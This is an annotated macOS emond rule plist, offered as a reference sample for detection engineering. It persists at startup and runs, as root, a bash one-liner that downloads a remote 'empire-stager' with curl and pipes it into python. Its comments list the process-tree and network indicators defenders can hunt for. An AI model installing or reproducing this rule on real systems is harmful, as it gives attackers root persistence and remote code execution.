Example malicious emond rule plist (two RunCommand actions run as root on the "startup" event; reference sample for detection engineering, not for deployment)
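<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<!--
  Example malicious emond rule file. Reference sample only (detection engineering,
  threat-hunting); do not install it.

  Structure: the top-level <array> holds emond rules, one <dict> per rule. This rule
  is enabled, is bound to the "startup" event type, and carries two RunCommand actions
  that both execute as root: a 10-second /bin/sleep, then a /bin/bash -c one-liner that
  curls a remote "empire-stager" and pipes it straight into python, backgrounded with &.

  NOTE(review): the claims above are what the file itself says. Where emond loads rule
  files from (conventionally /etc/emond.d/rules/), whether "startup" fires at boot, and
  whether emond still ships on current macOS releases (reportedly removed in recent
  versions) are not established by this sample; confirm against the target OS before
  building detections or playbooks on it.

  Fix vs. the original sample: the bare "&" inside the last <string> was not escaped,
  which makes the document non-well-formed XML. It is now "&amp;", which a parser
  decodes back to the identical runtime string.
-->
<plist version="1.0">
  <array>
    <dict>
      <!-- Rule name. "empire" matches the stager URL below and is itself a useful string indicator. -->
      <key>name</key>
      <string>empire rules</string>

      <!-- The rule is active. -->
      <key>enabled</key>
      <true/>

      <!-- Trigger: the rule is bound to the "startup" event type only. -->
      <key>eventTypes</key>
      <array>
        <string>startup</string>
      </array>

      <!-- Actions run in order. Both are RunCommand with user=root, so anything that can
           write this file gets root execution. -->
      <key>actions</key>
      <array>
        <!-- Action 1: /bin/sleep 10 as root. Delays the payload; only the file shows the
             delay, not its purpose (likely to wait for networking/other services). -->
        <dict>
          <key>command</key>
          <string>/bin/sleep</string>
          <key>user</key>
          <string>root</string>
          <key>arguments</key>
          <array>
            <string>10</string>
          </array>
          <key>type</key>
          <string>RunCommand</string>
        </dict>

        <!-- Action 2: /bin/bash -c "curl 'http://host/empire-stager' | python &" as root.
             Fetches a remote stager over plaintext HTTP and executes it without ever
             writing it to disk; "host" is a placeholder for the attacker's server.
             Detection hooks visible here: emond spawning bash, bash -> curl | python,
             a root-owned python child of emond, and outbound HTTP from that process tree. -->
        <dict>
          <key>command</key>
          <string>/bin/bash</string>
          <key>user</key>
          <string>root</string>
          <key>arguments</key>
          <array>
            <string>-c</string>
            <string>curl 'http://host/empire-stager' | python &amp;</string>
          </array>
          <key>type</key>
          <string>RunCommand</string>
        </dict>
      </array>
    </dict>
  </array>
</plist>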